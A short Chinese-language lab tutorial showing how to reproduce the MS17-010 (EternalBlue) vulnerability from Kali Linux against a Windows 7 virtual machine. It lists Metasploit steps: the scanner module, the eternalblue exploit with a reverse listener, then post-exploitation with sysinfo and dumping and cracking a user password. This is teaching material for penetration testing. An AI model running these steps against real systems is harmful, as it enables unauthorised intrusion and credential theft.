网络服务渗透测试实战-复现MS17-010漏洞
前言
1.什么是kali?
Kali 是基于 Debian 的 Linux 发行版操作系统,一开始是由 Offensive Security 的Mati Aharoni 和 Devon Kearns 通过重写 BackTrack 来完成,用来进行数字取证。而且它拥有超过 300 个渗透测试工具,拥有开源 Git 树等,甚至还集成了 600 多种黑客工具,完全可以想象到它的强大性。此外大家还可以永久免费使用 Kali 操作系统!Kali Linux 系统作为白帽、黑帽最受欢迎的渗透测试系统,你如果是一个安全渗透专家或者网络安全管理员,必须要学会慎重并且合理地利用这个系统,因为对目标系统造成的实质伤害会带来法律的约束以及制裁!
1、环境准备
以下环境均为NAT模式,准备二台虚拟机,先确保目标主机能与攻击主机互通
主机类型 | IP地址 |
---|---|
win7(目标主机) | 192.168.254.169 |
kali-linux(攻击主机) | 192.168.254.168 |
2、实验步骤
-
登入kali,打开终端,輸入msfconsole
-
搜索漏洞模块,使用search命令,search ms17-010
-
使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描,扫描命令:use auxiliary/scanner/smb/smb_ms17_010
-
进行攻击:use exploit/windows/smb/ms17_010_eternalblue,设置反向监听,开始后渗透靶机,开始攻击,使用run或者exploit命令
3、实验测试
- 显示远程主机系统信息: sysinfo
- 查看用户权限,获取用户密码
- 通过加密算法进行反向查询,得知 用户名:client 密码:12345678